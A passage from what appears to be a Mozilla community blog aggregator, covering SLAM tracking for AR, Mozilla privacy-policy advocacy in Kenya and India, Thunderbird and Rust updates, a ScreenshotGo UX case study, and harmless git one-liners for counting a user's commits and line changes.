We start with the principles by Cadena et. al in their "Past, Present, and Future of Simultaneous Localization and Mapping: Toward the Robust-Perception Age" paper. From that paper, we can see the standard architecture of SLAM to be something like
Image Credit: Cadena et al
If we deconstruct the diagram we get the following four modules
  1. Sensor: On mobiles, this is primarily Camera, augmented by accelerometer, gyroscope and depending on the device light sensor. Apart from Project Tango enabled phones, nobody ahd depth sensor for Android.
  2. Front End: The feature extraction and anchor identification happens here as we described in previous post.
  3. Back End: Does error correction to compensate for the drift and also takes care of localizing pose model and overall geometric reconstruction.
  4. SLAM estimate: This is the result containing the tracked features and locations.
To better understand it, we can take a look at one of the open source implementations of SLAM.

D.I.Y SlAM: Taking a peek at ORB-SLAM

To try our hands on to understand how SLAM works let's take a look at a recent algorithm by Montiel et al called ORB-SLAM. We will use the code of its successor ORB-SLAM2. The algorithm is available in Github under GPL3 and I found this excellent blog which goes into nifty details on how we can run ORB-SLAM2 in our computer. I highly encourage you to read that to avoid encountering problems at the setup.
His talk is also available here to see and is very interesting


ORB-SLAM just uses the camera and doesn't utilize any other gyroscope or accelerometer inputs. But the result is still impressive.
  1. Detecting Features: ORB-SLAM, as the name suggests uses ORB to find keypoint and generate binary descriptors. Internally ORB is based on the same method to find keypoint and generating binary descriptors as we discussed in part 1 for BRISK. In short ORB-SLAM analyzes each picture to find keyframe and then store it with a reference to the keyframe in a map. These are utilized in future to correct historical data.
  2. Keypoint > 3d landmark: The algorithm looks for new frames from the image and when it finds one it performs keypoint detection on it. These are then matched with the previous frame to get a spatial distance. This so far provides a good idea on where it can find the same key points again in a new frame. This provides the initial camera pose estimation.
  3. Refine Camera Pose: The algorithm repeats Step 2 by projecting the estimated initial camera pose into next camera frame to search for more keypoint which corresponds to the one it already knows. If it is certain it can find them, it uses the additional data to refine the pose and correct any spatial measurement error.
green squares  = tracked keypoints. Blue boxes: keyframes. Red box = camera view. Red points = local map points.
Image credits: ORB-SLAM video by Raúl Mur Artal


Returning home a.k.a Loop Closing

One of the goals of MR is when you walk back to your starting point it should understand you have returned. The inherent inefficiency and the induced error make it hard to accurately predict this. This is called loop closing for SLAM. ORB-SLAM handles it by defining a threshold. It tries to match keypoints in a frame with next frames and if the previously detected frames matching percentage exceeds a threshold then it knows you have returned.
Loop Closing performed by the ORB-SLAM algorithm.
Image credits: Mur-Artal, R., Montiel
To account for the error, the algorithm has to propagate coordinate correction throughout the whole frame with updated knowledge to know the loop should be closed
The reconstructed map before (up) and after (down) loop closure.
Image credits: Mur-Artal, R., Montiel

SLAM today:

Google: ARCore's documentation describes it's tracking method as "concurrent odometry and mapping" which is essentially SLAM+sensor inputs. Their patent also indicates they have included inertial sensors into the design.

Apple: Apple also is using Visual Interial Odometry which they acquired by buying Metaio and FlyBy. I learned a lot about what they are doing by having a look at this video at WWDC18.

Additional Read: I found this "A comparative analysis of tightly-coupled monocular, binocular, and stereo VINS" paper to be a nice read to see how different IMU's are used and compared. IMU's are the devices that provide all this sensory data to our devices today. And their calibration is supposed to be crazy difficult. 

I hope this post along with the previous one provides a better understanding of how our world is tracked inside ARCore/ARKit.

In a few days, I will start another blog series on how to build Mixed Reality applications and use experimental as well as some stable WebXR api's to build Mixed Reality application demos.
As always feedbacks are welcome.

References/Interesting Reads:

Mozilla Open Policy & Advocacy BlogKenya Considers Protection of Privacy and Personal Data

Mozilla applauds the government of Kenya for publishing the Data Protection Bill, 2018. This highly anticipated bill gives effect to Article 31 of the Constitution of Kenya, which protects the right to privacy, and, if passed, will be Kenya’s first data protection law.

Most notably, the bill includes:

  • An empowered and well resourced data protection commission with a high degree of independence from the government.
  • Strong obligations placed on data controllers and processors requiring them to abide by principles of meaningful user consent, collection limitation, purpose limitation, data minimization, and data security.
  • Robust protections for data subjects with the rights to rectification, erasure of inaccurate data, objection to processing of their data, as well as the right to access and to be informed of the use of their data, providing users with control over their personal data and online experiences.

This bill comes at a pivotal time. Kenya is a rapidly digitizing nation with  46.6 million mobile subscribers with a penetration rate of 97.8%. Over 99% of Kenya’s internet subscribers access the internet via mobile phones. Several government services are now available only online, compelling citizens to provide personal data to access services like registration of births. Furthermore, the Registration of Persons Act requires demographic and biometric data to be contained in an electronic national identity card, which is crucial for every-day life. All these services have accelerated the collection and analysis of personal data but the lack of a comprehensive data protection law exposes Kenyan citizens to risks of misuse of their data.

This proposed law is therefore a welcome opportunity for the government to develop a model data protection framework that upholds individual privacy and safeguards the data of generations of Kenyans including those who are yet to come online. Kenya’s draft data protection legislation is clearly inspired by the EU’s General Data Protection Regulation, and Kenya is striving to be the first country to receive an “adequacy” determination from the European Commission — a certification that a country has strong privacy laws, and which allows Europeans’ data to be processed in that country and for companies in that jurisdiction to more easily enter European markets. This bill is also an important step toward fulfilling the African Union Convention on Cyber Security and Personal Data Protection, which calls for member states to adopt legal frameworks for data privacy and cybersecurity.

Mozilla’s comments on the Kenyan data protection bill can be found here. Our work on Kenya’s data protection bill builds on our strong commitment to user privacy and security as can be seen both in the open source code of our products as well as in our policies. We believe that strong data protection laws are critical to ensuring that user rights and the private user data that  companies and governments are entrusted with are protected. We have been actively engaged in advocating for strong data protection laws in India, Brazil, the EU, and the US, and are enthusiastic to engage in this timely and historic debate in Kenya.

We believe that a strong data protection law must protect the rights of individuals with meaningful consent at its core. It must have strong obligations placed on data controllers and processors reflecting the significant responsibilities associated with collecting, storing, using, analyzing, and processing user data; and provide for effective enforcement by an empowered, independent, and well-resourced Data Protection Authority. We’re pleased to see all of these values included in the Kenyan data protection bill.

The bill was developed in open public consultations, another crucial pillar of the Kenyan constitution, which provides the public with the opportunity to take part in government and parliamentary decision making processes. The consultations received wide ranging comments from governments, private sector, academia, civil society, and individuals. The result is a bill that Kenya should be proud of.

We commend the government for the thoughtful and thorough framework  and urge Kenyan members of parliament to pass this critical data protection legislation and reconcile it with other statues, which contain provisions that threaten the good intentions of this bill. Without a data protection law, Kenyans private data is currently at risk.

With this legislation, Kenya is emerging as a leader in the digital economy and we hope this will serve as a positive example to the many other African governments that are currently considering data protection frameworks.

The post Kenya Considers Protection of Privacy and Personal Data appeared first on Open Policy & Advocacy.

Mozilla Addons BlogJanuary’s featured extensions

Firefox Logo on blue background

Pick of the Month: Auto Tab Discard

by Richard Neomy
Save memory usage by automatically hibernating inactive tabs.

“Wow! This add-on works like a charm. My browsing experience has improved greatly.”

Featured: Malwarebytes Browser Extension

by Malwarebytes Inc.
Enhance the safety and speed of your browsing experience by blocking malicious websites like fake tech support scams and hidden cryptocurrency miners.

“Malwarebytes is the best I have used to stop ‘Microsoft alerts’ and ‘Windows warnings’.”

If you’d like to nominate an extension for featuring, please send it to amo-featured [at] mozilla [dot] org for the board’s consideration. We welcome you to submit your own add-on!

The post January’s featured extensions appeared first on Mozilla Add-ons Blog.

Mozilla Open Policy & Advocacy BlogIndia attempts to turn online companies into censors and undermines security – Mozilla responds

Last week, the Indian government proposed sweeping changes to the legal protections for “intermediaries”, which affect every internet company today. Intermediary liability protections have been fundamental to the growth of the internet as an open and secure medium of communication and commerce. Whether Section 79 of the Information Technology Act in India (under which these new rules are proposed), the EU’s E-Commerce Directive, or Section 230 of the US’ Communications Decency Act, these legal provisions ensure that companies generally have no obligations to actively censor and limited liability for illegal activities and postings of their users until they know about it. In India, the landmark Shreya Singhal judgment had clarified in 2015 that companies would only be expected to remove content when directed by a court order to do so.

The new rules proposed by the Ministry of Electronics and Information Technology (MEITY) turn this logic on its head. They propose that all “intermediaries”, ranging from social media and e-commerce platforms to internet service providers, be required to proactively remove “unlawful” user content, or else face liability for content on their platform. They also propose a sharp blow to end-to-end encryption technologies, used to secure most popular messaging, banking, and e-commerce apps today, by requiring services to make available information about the creators or senders of content to government agencies for surveillance purposes.

The government has justified this move based on “instances of misuse of social media by criminals and anti-national elements”, citing lynching incidents spurred on by misinformation campaigns. We recognize that harmful content online – from hate speech and misinformation to terrorist content – undermines the overall health of the internet and stifles its empowering potential. However, the regulation of speech online necessarily calls into play numerous fundamental rights and freedoms guaranteed by the Indian constitution (freedom of speech, right to privacy, due process, etc), as well as crucial technical considerations (‘does the architecture of the internet render this type of measure possible or not’, etc). This is a delicate and critical balance, and not one that should be approached with such maladroit policy proposals.

Our five main concerns are summarised here, and we will build on these for our filing to MEITY:

  1. The proactive obligation on services to remove “unlawful” content will inevitably lead to over-censorship and chill free expression.
  2. Automated and machine-learning solutions should not be encouraged as a silver bullet to fight against harmful content on the internet.
  3. One-size-fits-all obligations for all types of online services and all types of unlawful content is arbitrary and disproportionately harms smaller players.
  4. Requiring services to decrypt encrypted data, weakens overall security and contradicts the principles of data minimisation, endorsed in MEITYs draft data protection bill.
  5. Disproportionate operational obligations, like mandatorily incorporating in India, are likely to spur market exit and deter market entry for SMEs.

We do need to find ways to hold social media platforms to higher standards of responsibility, and acknowledge that building rights-protective frameworks for tackling illegal content on the internet is a challenging task. However, whittling down intermediary liability protections and undermining end-to-end encryption are blunt and disproportionate tools that fail to strike the right balance. We stress that any regulatory intervention on this complex issue must be preceded by a wide ranging and participatory dialogue. We look forward to continue constructive engagement with MEITY and other stakeholders on this issue.

 

 

The post India attempts to turn online companies into censors and undermines security – Mozilla responds appeared first on Open Policy & Advocacy.

Will Kahn-GreeneSocorro: December 2018 happenings

Summary

Socorro is the crash ingestion pipeline for Mozilla's products like Firefox. When Firefox crashes, the crash reporter collects data about the crash, generates a crash report, and submits that report to Socorro. Socorro saves the crash report, processes it, and provides an interface for aggregating, searching, and looking at crash reports.

At Mozilla, December is a rough month to get anything done, but we accomplished a bunch anyways!

Read more… (3 mins to read)

Mozilla ThunderbirdThunderbird in 2019

From the Thunderbird team we wish you a Happy New Year! Welcome to 2019, and in this blog post we’ll look at what we got accomplished in 2018 and look forward to what we’re going to be working on this year.

Looking Back on 2018

More Eggs in the Nest

Our team grew considerably in 2018, to eight staff working full-time on Thunderbird. At the beginning of this year we are going to be adding as many as six new members to our team. Most of these people with the exception of this author (Ryan Sipes, Community Manager) are engineers who will be focused on making Thunderbird more stable, faster, and easier to use (more on this below).

The primary reason we’ve been able to do this is an increase in donors to the project. We hope that anyone reading this will consider giving to Thunderbird as well. Donations from individual contributors are our primary source of funding, and we greatly appreciate all our supporters who made this year so successful!

Thunderbird 60

We released the latest ESR, Thunderbird 60 – which saw many improvements in security, stability, and the app’s interface. Beyond big upgrades to core Thunderbird, Thunderbird’s calendar saw many improvements as well.

For the team this was also a big learning opportunity. We heard from users who upgraded and loved the improvements, and we heard from users who encountered issues with legacy add-ons or other changes that they hurt their workflow.

We listened, and will continue to listen. We’re going to build upon what made Thunderbird 60 a success, and work to address the concerns of those users who experienced issues with the update. Hiring more staff (as mentioned above) will go a long way to having the manpower needed to build even better releases going forward.

A Growing Community

Early in the year, a couple of members of the Thunderbird team visited FOSDEM – from then on we worked hard to ensure our users and contributors that Thunderbird was spreading its wings and flying high again.

That work was rewarded when folks came to help us out. The folks at Ura Design worked on us on a few initiatives, including a style guide and user testing. They’ve also joined us in working on a new UX team, which we very much expect to grow with a dedicated UX designer/developer on staff in the new year. If you are interested in contributing or following along, you can join the UX team mailing list here.

We heard from many users who were excited at the new energy that’s been injected into Thunderbird. I received many Emails detailing what our userbase loved about Thunderbird 60 and what they’d like to see in future releases. Some even said they’d like to get involved, so we made a page with information on how to do that.

We still have some areas to improve on this year, with one of them being onboarding core contributors. Thunderbird is a big, complex project that isn’t easy to jump into. So, as we closed out the year I opened a bug where we can detail what documentation needs to be created or updated for new members of the community – to ensure they can dive into the project.

Plans for 2019

So here we are, in 2019. Looking into the future, this year looks bright for the Thunderbird project. As I pointed out earlier in this post, we start the new year with the hiring of some new staff to the Thunderbird team. Which will put us at as many as 14 full-time members on our staff. This opens up a world of possibilities for what we are able to accomplish, some of those goals I will detail now.

Making Thunderbird Fly Faster

Our hires are already addressing technical debt and doing a fair bit of plumbing when it comes to Thunderbird’s codebase. Our new hires will also be addressing UI-slowness and general performance issues across the application.

This is an area where I think we will see some of the best improvements in Thunderbird for 2019, as we look into methods for testing and measuring slowness – and then put our engineers on architecting solutions to these pain points. Beyond that, we will be looking into leveraging new, faster technologies in rewriting parts of Thunderbird as well as working toward a multi-process Thunderbird.

A More Beautiful (and Useable) Thunderbird

We have received considerable feedback asking for UX/UI improvements and, as teased above, we will work on this in 2019. With the addition of new developers we will see some focus on improving the experience for our users across the board in Thunderbird.

For instance, one area of useability that we are planning on addresssing in 2019 is integration improvements in various areas. One of those in better GMail support, as one of the biggest Email providers it makes sense to focus some resources on this area. We are looking at addressing GMail label support and ensuring that other features specific to the GMail experience translate well into Thunderbird.

We are looking at improving notifications in Thunderbird, by better integrating with each operating system’s built-in notification system. By working on this feature Thunderbird will feel more “native” on each desktop and will make managing notifications from the app easier.

The UX/UI around encryption and settings will get an overhaul in the coming year, whether or not all this work makes it into the next release is an open question – but as we grow our team this will be a focus. It is our hope to make encrypting Email and ensuring your private communication easier in upcoming releases, we’ve even hired an engineer who will be focused primarily on security and privacy. Beyond that, Thunderbird can do a lot so we’ll be looking into improving the experience around settings so that it is easier to find and manage what you’re looking for.

So Much More

There are a still a few things to work out for a 2019 roadmap. But if you’d like to see a technical overview of our plans, take a look at this post on the Thunderbird mailing list.

Support Thunderbird

If you are excited about the direction that Thunderbird is headed and would like to support the project, please consider becoming a donor to the project. We even have a newsletter that donors receive with news and updates about the project (and awesome Thunderbird art). You can even make a recurring monthly gift to Thunderbird, which is much appreciated. It’s the folks that have given of their time or donated that have made 2018 a success, and it’s your support that makes the future look bright for Thunderbird.

 

This Week In RustThis Week in Rust 267

Hello and welcome to another issue of This Week in Rust! Rust is a systems language pursuing the trifecta: safety, concurrency, and speed. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

News & Blog Posts

#Rust2019

Find all #Rust2019 posts at Read Rust.

Crate of the Week

This week's crate is Dose Response, an online-playable roguelike game with a probably bleak outcome. Thanks to Vikrant Chaudhary for the suggestion!

Submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from Rust Core

150 pull requests were merged in the last week

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

No RFCs were approved this week.

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs

No RFCs are currently in final comment period.

Tracking Issues & PRs

No RFCs are currently in final comment period.

New RFCs

There are currently no new RFCs

Upcoming Events

Online
Asia
Europe
North America

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs

Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

In theory it would be entirely reasonable to guess that most Rust projects would need to use a significant amount of unsafe code to escape the limitations of the borrow checker. However, in practice it turns out (shockingly!) that the overwhelming majority of programs can be implemented perfectly well using only safe Rust.

– PM_ME_UR_MONADS on reddit

Thanks to nasa42 for the suggestion!

Please submit your quotes for next week!

This Week in Rust is edited by: nasa42, llogiq, and Flavsditz.

Discuss on r/rust.

Patrick ClokePatching a Mail Slot

The front door of my condo has an unused mail slot in it (we have a mailbox on the front of the house to actually get mail). In order to avoid a draft during the winter, the previous owner had shoved some insulation in the mail slot and covered it …

Hacks.Mozilla.OrgMozilla Hacks’ 10 most-read posts of 2018

Must be the season of the list—when we let the numbers reveal what they can about reader interests and attention over the past 360-some days of Mozilla Hacks.

Our top ten posts ranged across a variety of categories – including JavaScript and WebAssembly, CSS, the Web of Things, and Firefox Quantum. What else does the list tell us? People like code cartoons!

I should mention that the post on Mozilla Hacks that got the most traffic in 2018 was written in 2015. It’s called Iterators and the for-of loop, and was the second of seventeen articles in an amazing, evergreen series, ES6 In Depth, crafted and written in large part by Jason Orendorff, a JavaScript engineer.

Today’s list is focused on the year we’re about to put behind us, and only covers the posts written in calendar year 2018.

  1. Ben Francis kicked off Mozilla’s Project Things with this post about the potential and flexibility of WoT: How to build your own private smart home with a Raspberry Pi and Mozilla’s Things Gateway. It’s the opener of a multi-part hands-on series on the Web of Things, from Ben and team.
  2. Lin Clark delivered A cartoon intro to DNS over HTTPS in true-blue code cartoon style.
  3. In April, she gave a brilliant exposition of ES modules in ES modules: A cartoon deep-dive.
  4. WebAssembly has been a consistently hot topic on Hacks this year: /" target="_blank">Calls between JavaScript and WebAssembly are finally fast 🎉.
  5. Don’t underestimate the importance of WebAsssembly for making the web viable and performant. As 2018 opened, Lin Clark illustrated its role in the browser: Making WebAssembly even faster: Firefox’s new streaming and tiering compiler.
  6. Research engineer Michael Bebenita shared a Sneak Peek at WebAssembly Studio, his interactive visualization of WebAssembly.
  7. Developer Advocate Josh Marinacci, who’s focused on sharing WebVR and Mozilla Mixed Reality with web developers, wrote a practical post about CSS Grid for UI Layouts—on how to improve your app layouts to respond and adapt to user interactions and changing conditions, and always have your panels scroll properly.
  8. As the year began to wind down, we got a closer look at how the best is yet to come for WebAssembly in WebAssembly’s post-MVP future: A cartoon skill tree from Lin Clark, Till Schneidereit, and Luke Wagner.
  9. Potch delivered his Hacks swan song as November drew to a close. The Power of Web Components was years in the making and well worth the wait.
  10. Mozilla Design Advocate and Layout Land creator Jen Simmons walked us through the ins and outs of resilient CSS in this seven-part video series you won’t want to miss: How to Write CSS That Works in Every Browser, Even the Old Ones.

Thanks for reading and sharing Mozilla Hacks in 2018. Here’s to 2019. There’s so much to do.

It’s always a good year to be learning. Want to keep up with Hacks? Follow @mozhacks on Twitter or subscribe to our always informative and unobtrusive weekly Mozilla Developer Newsletter below.

The post Mozilla Hacks’ 10 most-read posts of 2018 appeared first on Mozilla Hacks - the Web developer blog.

Andy McKay2019 Goals

My goal: I'm going to beat last years time of 4:19 and do the Whistler Gran Fondo in September 2019 in 4 hours.

That seems absurdly ridiculous on the face of it, but the fact that I was able to shave off 23 minutes this year was nothing short of miraculous to me. So let's try shaving off another 19 minutes. How am I going to do this?

  1. Get serious about losing weight again. I've done it in the past and then I revert. This year I'm aiming for a race weight of 160 lbs. In the past I've been around 180 lbs by the time I do the Gran Fondo.

  2. Improve my watts per kg. The amount of power you can output is important so I've got to lose weight without losing muscle. I did an estimated 236w power last Fondo, if I can do the some power output and weigh less I'll push up my time.

Actual things I'm going to do to meet these goals:

  1. Do a half marathon. I'm in the BMO Half in May. I've done 4 10k races so far and I found the last one a bit slow and painful. I need to get comfortable at doing 5k every day and a 10k regularly.

  2. Cycle regularly in the Steed group 2. That's the faster group than I normally ride in.

  3. Complete the Seymour Hill Climb in under 1 hour. My top time is 1:15:34 and according to Strava I'm 4924 / 6151. There's room for improvement there.

  4. Do lots of work at the gym to work on my core, leg and back muscles.

I can totally do this.

Disclaimer: I might just say screw it and not do this. It's my life.

Firefox UXA bumpy road to Firefox ScreenshotGo in a foreign market

Back in January 2018, we were assigned to lead a project called New Product Exploration to help Mozilla grow impact on shopping experience in Southeast Asia, and the first stop was Indonesia, a country I had not visited and barely knew!

To quickly dive into the market and design a great product within six weeks, we adopted Lean UX thinking and continually fine-tuned the design process* that has proven to be successful in this journey. Furthermore, we also practiced the strategic approach, Playing to Win**, to fit the emerging markets aligning the business model/goal. In short, we pushed forward and discovered by the following design process:

1. Explore & learn: discover and prioritize user needs on shopping demands
2. Assumptions to validate: create and validate preliminary assumptions
3. Design & build prototype: develop the prototype by collaborative design
4. Test & iterate: field research with users by prototype to iterate

<figcaption>Fine-tuned structure according to Lean UX process</figcaption>

Explore & learn
Though Indonesia is just 5 hours-flight from Taiwan, I had little knowledge about its language, culture, value, etc. Fortunately, Ruby Hsu, our user researcher who had done extensive research and interviews in Indonesia, brought us decent observation and research findings as our starting point. Next, the team did extensive desk research to understand their shopping behaviors. With the research findings, we depicted the shopping journey to explore the opportunities and pain points.

<figcaption>User journey is a sequence of events a user may take or interact with something to reach their goal</figcaption>

According to the shopping journey, we synthesized five general directions for further exploration:
- Price comparison
- Save to Wish list
- Save Money Helper
- Reviews
- Cash Flow Management

For each track, we validated assumptions by quantitative questionnaires via JakPat, a mobile survey service in Indonesia. Around 200 participants, online shoppers, were recruited for each survey. The surveys offered us fundamental knowledge covered from their daily life to specific shopping behaviors across genders, ages, and monthly spending, etc. Surprisingly, the most significant pattern was that

screenshot always served as a dominant tool to fulfill most needs, like keeping wish lists, promotions, shopping history, and cash flows, which was really out of our expectation.

Too much to do, but too little time. With so many different things going on, knowing how to prioritize effectively can be a real challenge. To have each member from different disciplines become familiar with the knowledge, we held a workshop to develop the problem statement and persona to represent what we have learned from our research.

<figcaption>Persona is a representation of a type of target users</figcaption>

At the end of the workshop, the participants of the brainstorming session helped the team identify and assess risks and values as references to determine the exact location for each direction in the Risk/Value Matrix. “Save to wish list” was the one with the lowest risk but the highest value considering the limited time and resources, which was the different logic of Lean UX.

<figcaption>Risk/Value Matrix prioritizes the potential ideas, which Lean UX believes the higher the risk and the more the value, the higher the priority is to test first</figcaption>

The team believed that creating a cross-channel wish list tool for online shoppers could be valuable since it could track original product information and discover the relevant items tailored to their taste.

Assumptions to validate

We determined the direction. It is time to march forward. We invited representatives from all function teams to create hypothesis and assumptions. The workshop consisted of four parts, business outcomes, users, user outcomes and features. At last, we mapped all materials from those four aspects to create the feature hypotheses:

We believe this [business outcome] will be achieved if [these users] successfully achieve [this user outcome] with [this feature].
<figcaption>Cross-disciplinary workshop</figcaption>

Considering the persona, we prioritized and chose three hypotheses via risk prioritization matrix. To speed up the validation, we decided three most essential and developed surveys with storyboards accordingly to verify, which were “universal wish list,” “organized wish list” and “social wish list.”

<figcaption>Left to right: Universal wish list, Organized wish list, and Social wish list</figcaption>

The result revealed that the high demands for the first two ideas but the last one required further validation for the potential needs. Out of our expectation again, how Indonesians used screenshots was still the highlight of the survey results.

The screenshot was the existing and dominant tool they got used to capturing everything beyond shopping needs.

Design & build prototype

With all the validated assumptions, we concluded to develop an app to help Indonesians make good use of screenshots as a quick, universal information manager across various online sources. Furthermore, they could get back to online sources through collected screenshots.

At that time, we have to make our ideas tangible for testing. After the collaborative workshop with engineers on the early design and continuous feasibility check, I used Figma, a collaborative design tool, to quickly develop fundamental information architecture and interaction details. By co-operating and referring to the evolving UX wireframe, everyone showed their capabilities simultaneously.

<figcaption>Collaborated UX spec via Figma</figcaption>

While Fang Shih, the UI designer, was busy with designing the look and feel into the visual spec, Mark Liang, our prototyper, was coding the infrastructure and high fidelity prototype with Frammer. Last but not least, Ricky Yu, the user researcher, took care of the research plan, recruiting and testing schedule in Indonesia.

Test & Iterate

With everything prepared, we flew to Indonesia to meet the real users and listened to their inner thoughts. The research trip consisted of three sections. Among the eight recruited participants, the first four were interviewed for the validation of the unmet needs, which we put more focus on their screenshot behaviors, mental models. We took one day to iterate the design, then kept testing the rest participants for concept feedback, like the IA, usability.

<figcaption>Overview of testing</figcaption>

Each participant took various tasks for us to understand and learn their feelings, thoughts, and behaviors, such as demoing screenshots, prioritizing top features, etc. The entire research trip confirmed our observation about the screenshots to Indonesians:

“Almost everything I screenshot,” said one of our participants.

Shaping the product

As the answers from the interviews analyzed, their screenshot behavior and pain points gradually emerged in each step of the screenshot process, including triggering, storing, and retrieving.

Why did Indonesians like to screenshot?

Apps provided a better experience than websites, even better prices in some e-commerce apps. Screenshots was a quick and universal tool to grab information across apps. Besides, with the unstable, slow, and limited data plan, they were more inclined to capture online live through an offline screenshot instead of a hyperlink, which might cost forever loading.

What pain points did Indonesians have in storing and retrieving?

Handy screenshots led to countless images in Gallery, which caused users hard to locate the needed screenshot. Even though the screenshot was found, the static image did not provide any digital data for relevant actions in the smartphone — for instance; users had to memorize the info on the screenshot and search more relevant content again.

In conclusion, screenshots to Indonesians could be defined as a universal offline tool to capture information across various apps for further exploration online. However, they are looking for an app to find needed screenshots among numerous images readily and make good use of screenshots to explore related knowledge and content. The validated findings shaped the blueprint of Firefox ScreenshotGo — an Android app that helps Indonesians easily capture, manage screenshots and explore more relevant information.

As for how we measured the market size and launched the product, allow me to spend another post to cover the details.

<figcaption>Firefox ScreenshotGo is only available in Indonesia Google play store, but you can still install by following the instructions.</figcaption>

Why did Mozilla build Firefox ScreenshotGo?

It is a great question! Here I would like to briefly talk about how we adopted Playing to Win to delve into the answer. The strategic narrative focused on fulfilling Mozilla mission. Users screenshotted their online life across app silos who offered limited or manipulated information. Mozilla targeted to encourage users to go back to the open web to search more linked content freely with those screenshots as bookmarks.

<figcaption>Strategic narrative</figcaption>

*Lean UX process is a cycle of four actions, starting with “Research & learning”, “Outcomes, assumptions, hypotheses”, “Design it” and “Create an MVP.”
**Playing to Win provides a step-by-step framework to develop a strategy.


A bumpy road to Firefox ScreenshotGo in a foreign market was originally published in Firefox User Experience on Medium, where people are continuing the conversation by highlighting and responding to this story.

Shing LyuCounting your contribution to a git repository

Sometimes you may wonder, how many commits or lines of code did I contributed to a git repository? Here are some easy one liners to help you count that.

Number of commits

Let’s start with the easy one: counting the number of commits made by one user.

The easiest way is to run

git shortlog -s

This gives you a list of commit counts by user:

2  Grant Lindberg
9  Jonathan Hao
2  Matias Kinnunen
65  Shing Lyu
4  Shou Ya
1  wildsky
1  wildskyf

(The example comes from shinglyu/QuantumVim.)

If you only care about one user you can use

git rev-list HEAD --author="Shing Lyu" --count 

, which prints 65.

Let’s explain how this works:

  • git rev-list HEAD will list the commit objects in HEAD
  • --author="Shing Lyu" will filter out only the commits made by the author Shing Lyu
  • --count counts the number of commits. You can pipe it to | wc -l instead.

Count the line of insertion and deletions by a user

Insertion and deletions are a little bit tricker. This is what I came up with:

git log --author=Shing --pretty=tformat: --numstat | grep -v '^-' | awk '{ add+=$1; remove+=$2 } END { print add, remove }' 

This might seem a little bit daunting, but we’ll break it up into steps:

  • git log --author="Shing Lyu" list the commits by Shing Lyu, in the following format:

    commit 6966b2c969cbf62029792221bf124ed75ee2c640
    Author: Shing Lyu <shing.lyu@gmail.com>
    Date:   Sat Nov 18 17:01:25 2017 +0100
    
        Added Ctrl+z to close all system tabs
    
    commit f4710cc3a2efdc63c7caf3ec04d504912ad20a93
    Author: Shing Lyu <shing.lyu@gmail.com>
    Date:   Sat Nov 18 15:58:20 2017 +0100
    
        Bump version and diable jpm packaging
    
  • --numstat will give us the line added and removed per file per commit:

    commit 6966b2c969cbf62029792221bf124ed75ee2c640
    Author: Shing Lyu <shing.lyu@gmail.com>
    Date:   Sat Nov 18 17:01:25 2017 +0100
    
        Added Ctrl+z to close all system tabs
    
        1       0       README.md
        10      0       manifest.json
        6       1       package.sh
        35      0       vim-background.js
        4       1       vim.js
    
    commit f4710cc3a2efdc63c7caf3ec04d504912ad20a93
    Author: Shing Lyu <shing.lyu@gmail.com>
    Date:   Sat Nov 18 15:58:20 2017 +0100
    
        Bump version and diable jpm packaging
    
        1       1       manifest.json
        3       3       package.sh
    
  • We don’t really need the commit, Author, Date and commit message fields, so we use an empty formatting string to get rid of them: --pretty=tformat:

    1       0       README.md
    10      0       manifest.json
    6       1       package.sh
    35      0       vim-background.js
    4       1       vim.js
    1       1       manifest.json
    3       3       package.sh
    
  • If you add some non-text files, e.g. png image files, the insertion/deletion count might be represented as - - foo.png. Therefore we filter them out with grep -v '^-'. If you are not familiar with grep, -v means reverse match (i.e. find those lines that does NOT match the patter). The pattern ^- means lines staring with a -. (This part is optional if you pipe to awk, awk seems to ignore non-numeric character while doing the math.)

  • Finally we pipe it to awk for summing. Even if you are not familiar with awk, this part is pretty self-explanatory:

    awk '{ add+=$1; remove+=$2 } END { print add, remove }'
    

    We add column one ($1) to the variable add, and column two ($2) to the variable remove, then we print them out. This gives us an output like so:

    936 260 
    

Other alternatives

There are many other off-the-shelf scrips that will help you calculate contribution statistics. Like git-quick-stats, git-fame and git-fame-rb. But if you only want a quick-and-easy solution please give it a try.

This Week In RustThis Week in Rust 266

Hello and welcome to another issue of This Week in Rust! Rust is a systems language pursuing the trifecta: safety, concurrency, and speed. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

News & Blog Posts

#Rust2019

Find all #Rust2019 posts at Read Rust.

Crate of the Week

This week's crate is sandspiel, a WASM-powered online sandbox automaton game. Thanks to Vikrant Chaudhary for the suggestion!

Submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from Rust Core

214 pull requests were merged in the last week

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

No RFCs were approved this week.

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs

No RFCs are currently in final comment period.

Tracking Issues & PRs

New RFCs

Upcoming Events

Online
Europe
North America

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs

Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

Using (traits) for Inheritance was like putting car wheels on a boat because I am used to driving a vehicle with wheels.

– Marco Alka on Hashnode

Thanks to oberien for the suggestion!

Please submit your quotes for next week!

This Week in Rust is edited by: nasa42, llogiq, and Flavsditz.

Discuss on r/rust.

QMOFirefox 65 Beta 6 Testday Results

Hello Mozillians!

As you may already know, last Friday December 21st – we held a new Testday event, for Firefox 65 Beta 6.

